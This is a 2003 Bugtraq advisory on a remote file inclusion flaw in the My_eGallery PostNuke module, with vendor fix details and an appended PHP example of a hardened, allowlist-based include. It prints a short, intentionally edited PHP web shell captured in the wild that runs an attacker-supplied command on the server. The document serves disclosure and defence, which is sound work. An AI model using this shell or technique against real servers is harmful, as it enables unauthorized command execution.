Message-ID: <20031126203800.37A9E42F3B@maja.zesoi.fer.hr>
Date: Thu, 27 Nov 2003 09:37:36 +1300
From: "Bojan Zdrnja" <Bojan.Zdrnja@....hr>
To: <bugtraq@...urityfocus.com>
Subject: Remote execution in My_eGallery

Product: My_eGallery
Versions affected: all <3.1.1.g
Website: http://lottasophie.sourceforge.net/index.php

1. Introduction
---------------

My_eGallery is a very nice PostNuke module, which allows users to create and manipulate their own galleries on the web, plus offers various additional features. For more information and a demonstration you can go to the Website above.

2. Exploit
----------

Any version of My_eGallery prior to 3.1.1.g is susceptible to this vulnerability. Certain PHP files pass some request parameters to include functions without filtering them. An intruder can host PHP code on their own web site and supply its location as a parameter to My_eGallery, so that the module includes and executes the malicious PHP code.

The following code was captured as being used in the wild (edited intentionally):

    <?
    // CMD - To Execute Command on File Injection Bug ( gif - jpg - txt )
    if (isset($chdir)) @chdir($chdir);
    ob_start();
    execute("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
    $output = ob_get_contents();
    ob_end_clean();
    print_output();
    ?>

This allows execution of any command on the server running My_eGallery, under the privileges of the web server user (usually apache or httpd).

3. Solution
-----------

The vendor was contacted and promptly replied. A fix is available at the vendor's site:

http://lottasophie.sourceforge.net/modules.php?op=modload&name=Downloads&file=index&req=viewdownload&cid=5

As this was seen being exploited in the wild, users are urged to upgrade to the latest version as soon as possible.

Regards,

Bojan Zdrnja
CISSP
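As an added illustration of the bug class the advisory describes (this is not My_eGallery's code and not the vendor's fix), the following PHP shows the unfiltered-include pattern next to a hardened version that maps the request parameter onto a fixed allowlist and confirms the resolved path stays inside the module directory. The parameter name `page`, the `pages/` directory, the allowlist entries and the `resolve_include` helper are assumptions made for this example; it is written for PHP 7 or later.

```php
<?php
// Added example, not My_eGallery code. The parameter name "page", the
// pages/ directory and the allowed names below are assumptions.

// Vulnerable pattern (the shape of bug the advisory describes): the request
// parameter flows straight into include(), so a value pointing at a remote
// file is fetched and executed when allow_url_fopen is enabled.
//
//   include($_GET['page'] . '.php');

// Hardened form: never build an include path from user input; instead treat
// the value as a key into a fixed allowlist and verify the final path.
function resolve_include(string $requested, array $allowed, string $baseDir): ?string
{
    // Only short bare names are acceptable: no scheme, no slash, no dot,
    // so neither "http://..." nor "../" can survive this check.
    if (!preg_match('/^[a-z0-9_]{1,32}$/i', $requested)) {
        return null;
    }
    // Strict comparison against the allowlist (no type juggling).
    if (!in_array($requested, $allowed, true)) {
        return null;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $requested . '.php');
    // realpath() resolves symlinks and "..", so a final containment check
    // guarantees the file really lives under the module directory.
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Hypothetical allowlist of pages the module is willing to load.
$allowed = ['gallery', 'upload', 'admin'];

$target = resolve_include($_GET['page'] ?? 'gallery', $allowed, __DIR__ . '/pages');
if ($target === null) {
    header('HTTP/1.0 400 Bad Request');
    exit('invalid page');
}
include $target;
```

Independently of the code fix, setting `allow_url_fopen = Off` in php.ini (and, on PHP 5.2 and later, `allow_url_include = Off`) stops `include()` from fetching remote URLs at all, which removes the remote-code path for this whole bug class as a defence in depth. It does not prevent inclusion of local files the attacker can influence (uploads, logs), which is why the allowlist and containment check remain necessary.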